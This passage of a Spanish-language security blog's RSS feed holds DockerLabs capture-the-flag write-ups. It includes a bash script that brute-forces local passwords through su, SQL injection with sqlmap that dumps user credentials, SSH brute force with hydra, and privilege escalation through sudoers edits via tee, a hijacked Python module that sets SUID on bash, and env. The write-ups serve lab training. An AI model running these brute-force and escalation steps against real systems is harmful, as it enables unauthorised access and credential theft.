   echo -e &quot;\e[1;31mSe deben especificar tanto el nombre de usuario como el archivo de diccionario.\e[0m&quot;  
   exit 1  
}  
  
# Para imprimir un sencillo banner en alguna parte del script.  
imprimir_banner() {  
   echo -e &quot;\e[1;34m&quot;  # Cambiar el texto a color azul brillante  
   echo &quot;******************************&quot;  
   echo &quot;*     BruteForce SU         *&quot;  
   echo &quot;******************************&quot;  
   echo -e &quot;\e[0m&quot;  # Restablecer los colores a los valores predeterminados  
}  
  
# Llamamos a esta función desde el trap finalizar SIGINT (En caso de que el usuario presione control + c para salir)  
finalizar() {  
   echo -e &quot;\e[1;31m\nFinalizando el script\e[0m&quot;  
   exit  
}  
  
trap finalizar SIGINT  
  
usuario=$1  
diccionario=$2  
  
# Variable especial $# para comprobar el número de parámetros introducido. En caso de no ser 2, se imprimen las instrucciones.  
if [[ $# != 2 | $ &amp;gt;  != 2 ]]; then  
   mostrar_ayuda  
fi  
  
# Imprimimos el banner al momento de realizar el ataque.  
imprimir_banner  
  
# Bucle while que lee línea a línea el contenido de la variable $diccionario, que a su vez esta variable recibe el diccionario como parámetro.  
while IFS= read -r password; do  
   echo &quot;Probando contraseña: $password&quot;  
   if timeout 0.1 bash -c &quot;echo '$password' | su $usuario -c 'echo Hello'&quot; &amp;gt; /dev/null 2&amp;gt;&amp;amp;1; then  
       clear  
       echo -e &quot;\e[1;32mContraseña encontrada para el usuario $usuario: $password\e[0m&quot;  
       break  
   fi  
done &amp;lt; &quot;$diccionario&quot;

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Entonces con estas dos cosas en la maquina victima vamos hacer lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/1922dba9-0477-45d0-ab9a-a7d58b4ec480&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/ccda5f03-ab4c-4a6d-85e9-167ed80bc720&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya tenemos la contraseña de carlos así que vamos a escalar a este usuario&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/1d1cccd8-336e-4c4b-bc47-c3141d64ec82&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos que carlos puede ejecutar el binario tee como cualquier usuario.&lt;/p&gt;

&lt;p&gt;*El comando tee en sistemas Unix y Linux es una herramienta de línea de comandos que se utiliza para leer desde la entrada estándar (stdin) y escribir simultáneamente a la salida estándar (stdout) y a un archivo. Esto significa que puedes usar tee para ver la salida de un comando mientras también guarda esa salida en un archivo.&lt;/p&gt;

&lt;p&gt;Como podemos usar tee como root vamos añadir a carlos al archivo sudoers para que podamos escalar a root sin proporcionar contraseña&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/f52bd910-9457-43bc-b915-9c65a4bc5497&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya somos root&lt;/p&gt;
</description>
        <pubDate>Fri, 21 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//Bashpariencias</link>
        <link href="https://romabri.github.io/Bashpariencias"/>
        <guid isPermaLink="true">https://romabri.github.io/Bashpariencias</guid>
      </item>
    
      <item>
        <title>UserSearch - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Medio&lt;/td&gt;
      &lt;td&gt;kvzlx&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/0297f62a-c2bb-43fb-80ae-a718d6d058b5&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que esta abierto el puerto 22 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SSH&lt;/code&gt; y el puerto 80 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;enumeración-web&quot;&gt;Enumeración Web&lt;/h2&gt;

&lt;p&gt;Si accedemos a la pagina web vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/a9e9ff81-f698-4e76-9e7d-3400580bbd25&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Usamos &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Gobuster&lt;/code&gt; para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir&lt;/code&gt; - Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-u http://172.20.10.5/&lt;/code&gt; Especifica la URL objetivo que deseas escanear en busca de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-w&lt;/code&gt; Especifica que diccionario queremos usar&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-x&lt;/code&gt; Para indicar que tipo de extension queremos que nos encuentre&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Gobuster no ha encontrado nada&lt;/p&gt;

&lt;p&gt;Si nos fijamos en el mensaje de unauthorized query me da que pensar que por detras tiene una base de datos así que vamos a ver si podemos ver algo con sqlmap&lt;/p&gt;

&lt;h2 id=&quot;ataque-sqli-sqlmap&quot;&gt;Ataque SQLi SQLMap&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sqlmap -u http://172.19.0.2 --forms --dbs --batch
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/dda3a671-d9c9-4efa-b3a9-31ab0c0caac5&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahora haremos una consulta de tablas en la base de datos testdb.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sqlmap -u http://172.19.0.2 --forms -D testdb --tables --batch
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/096612c4-77f5-4628-99a0-f8ce9fc620cf&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos a listar que columnas hay dentro de la tabla users&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sqlmap -u http://172.19.0.2 --forms -D testdb -T users --columns --batch
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/a7a1b019-0472-4422-a35d-53403393c2e6&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Por ultimo vamos a ver que hay dentro de la columna password y username&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sqlmap -u http://172.19.0.2 --forms -D testdb -T users -C id,password,username --dump --batch
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/4e01cc66-526c-400f-a7c5-7d02495d6a46&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tenemos una serie de usuarios y contraseñas.&lt;/p&gt;

&lt;h2 id=&quot;intrusión-a-la-máquina&quot;&gt;Intrusión a la máquina&lt;/h2&gt;

&lt;p&gt;Vamos a probar de acceder con el usuario kvzlx y la contraseña que hemos encontrado&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/f34fb530-8bf6-4f75-a91f-55f5608ccaa0&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si hacemos un sudo -l vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/48d9aed7-61de-4724-919f-8fb44569a3cf&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;escalada-de-privilegios&quot;&gt;Escalada de privilegios&lt;/h2&gt;

&lt;p&gt;Vamos hacer un cat del script&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/ec98009d-76fe-4bb0-8fec-47dd7d90e343&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vemos varias cosas:&lt;/p&gt;

&lt;p&gt;-&amp;gt; Importa el modulo psutil
-&amp;gt; Utiliza virtual_memory() como función&lt;/p&gt;

&lt;p&gt;Vamos a pasarle linpeas ya que no encontramos nada&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/3de9a1d9-e57d-4e29-a2a9-24a6842babb2&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Encontramos esto que es el modulo de psutil y si nos fijamos tenemos permisos de escritura en el init.py&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/38f62f5a-fcfd-4605-907f-a325c0a46488&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Vamos a probar de introducir un código para que nos muestre que usuario esta ejecutando el script de la siguente forma.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/f268e77f-4440-4d34-9c9b-5253c01688e4&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahora si ejecutamos el script con el binario de python3 nos deberia decir root y luego debería ejecutar el script.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/da1702e4-047a-4dbf-b76e-924c5bc429fd&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Genial como esto nos lo ha realizado ya tenemos una via de explotación para la escalada de privilegios&lt;/p&gt;

&lt;p&gt;Lo que vamos hacer va ha ser que la bash tenga permiso SUID de la siguiente forma&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/fb9c11cd-daa4-4eaf-ba33-c30c9081d859&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahora si ejecutamos el script y posteriormente hacemos bash -p&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/92967f99-631b-4c6e-ac0a-50be3e02f74c&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya somos root&lt;/p&gt;

</description>
        <pubDate>Mon, 03 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//UserSearch</link>
        <link href="https://romabri.github.io/UserSearch"/>
        <guid isPermaLink="true">https://romabri.github.io/UserSearch</guid>
      </item>
    
      <item>
        <title>BuscaLove - DockerLabs</title>
        <description>&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;OS&lt;/th&gt;
      &lt;th&gt;Dificultad&lt;/th&gt;
      &lt;th&gt;Creator&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Linux&lt;/td&gt;
      &lt;td&gt;Fácil&lt;/td&gt;
      &lt;td&gt;Prendelo&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;h2 id=&quot;escaneo-y-reconocimiento-de-puertos&quot;&gt;Escaneo y Reconocimiento de puertos&lt;/h2&gt;

&lt;p&gt;Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/73fab817-5001-4d12-b048-1ee5f39a5324&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap -p- --open -sS -sC -sV --min-rate=5000 -vvv -n -Pn -oN escaneo 172.17.0.2&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p-&lt;/code&gt;: Escanea todos los puertos (1-65535).&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--open&lt;/code&gt;: Solo muestra los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sS&lt;/code&gt;: Realiza un escaneo SYN, que es rápido y discreto.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sC&lt;/code&gt;: Utiliza los scripts de reconocimiento por defecto de Nmap.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-sV&lt;/code&gt;: Detecta la versión del servicio en los puertos abiertos.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;--min-rate=5000&lt;/code&gt;: Envía al menos 5000 paquetes por segundo, acelerando el escaneo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-n&lt;/code&gt;: No realiza resolución DNS.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-Pn&lt;/code&gt;: No realiza ping previo para determinar si el host está activo.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-vvv&lt;/code&gt;: Muestra resultados detallados y en tiempo real.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vemos que esta abierto el puerto 22 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SSH&lt;/code&gt; y el puerto 80 &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HTTP&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;enumeración-web&quot;&gt;Enumeración Web&lt;/h2&gt;
&lt;p&gt;Si accedemos a la pagina web vemos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/44a5184a-a0c0-46a3-8c29-05b5961b701a&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Usamos &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Gobuster&lt;/code&gt; para hacer un reconocimiento web y ver que directorios podemos encontrar en dicho sitio.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gobuster dir&lt;/code&gt; - Indica que estás utilizando la herramienta Gobuster para realizar un escaneo de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-u http://172.20.10.5/&lt;/code&gt; Especifica la URL objetivo que deseas escanear en busca de directorios.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-w&lt;/code&gt; Especifica que diccionario queremos usar&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-x&lt;/code&gt; Para indicar que tipo de extension queremos que nos encuentre&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Gobuster ha encontrado un /wordpress&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/3aa34da4-8ad1-49ae-bb73-1aac7053e97c&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/4fe7d7f3-d59e-4bc6-bb11-ef33a0287475&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si miramos el código fuente de la pagina vemos un comentario&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/d963237b-831b-464d-a9d9-df833d0d096f&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Hacemos otro reconocimiento con gobuster y encuentra únicamente un index.php&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/d8ec9909-498e-4188-96be-c6ca342ba922&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Lo que se me ocurre es hacer fuzzing a palabras que puedan ser explotadas a un LFI.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/a49f2a10-e6d7-4b84-abc1-b5bc5ae3bc95&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Encontramos la palabra love vamos a probar.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/b42d9af1-dc96-48a1-a6f8-2abc49721668&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Funciona, ahora tenemos dos posibles usuarios pedro y rosa, vamos hacer un ataque de fuerza bruta a estos usuarios al protocolo SSH con hydra&lt;/p&gt;

&lt;h2 id=&quot;ataque-de-fuerza-bruta-ssh&quot;&gt;Ataque de fuerza bruta SSH&lt;/h2&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/f751ed74-3328-43f9-9cdc-008e2686e8ae&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hydra -l pedro -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2&lt;/code&gt;. &lt;br /&gt; 
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-h&lt;/code&gt; ⮞ dirección IP de la máquina victima &lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-u&lt;/code&gt; ⮞ nombre del posible usuario &lt;br /&gt; 
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-P&lt;/code&gt; ⮞ ruta del rockyou.&lt;/p&gt;

&lt;p&gt;Como ya tenemos una contraseña vamos acceder a la maquina vía SSH.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/faa2272c-1eea-4c37-b3ae-692121f61c73&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;escalada-de-privilegios&quot;&gt;Escalada de privilegios&lt;/h2&gt;

&lt;p&gt;Si hacemos un sudo -l vemos que tenemos los binarios ls y cat que los podemos ejecutar como cualquier usuario&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/2f4c3ba8-b0d5-4637-a68f-1fd7130abfe1&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Si miramos en el interior de la carpeta root encontramos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/5c6996e8-7534-414c-9a60-786a97ea548f&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Es en exadecimal lo que vamos hacer es decodificarlo&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/bfa1c572-decc-4c24-9eff-649be562396e&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tenemos una contraseña vamos a probar de acceder con esta contraseña con el usuario root o pedro.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/1e386310-9d9d-42eb-b3b6-60821d5d8a7c&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ahora con el usuario pedro vamos a buscar algo para poder escalar a root.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/626974c3-761c-4744-b2d5-0b5a95abb677&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Tenemos el binario env para escalar privilegios a root haremos lo siguiente&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/romabri/romabri.github.io/assets/51706860/bc5b47ad-a506-4e70-a8ff-fb052345a346&quot; alt=&quot;imagen&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Ya somos ROOT&lt;/p&gt;
</description>
        <pubDate>Mon, 03 Jun 2024 00:00:00 +0000</pubDate>
        <link>https://romabri.github.io//BuscaLove</link>
        <link href="https://romabri.github.io/BuscaLove"/>
        <guid isPermaLink="true">https://romabri.github.io/BuscaLove</guid>
      </item>
    
  </channel>
</rss>
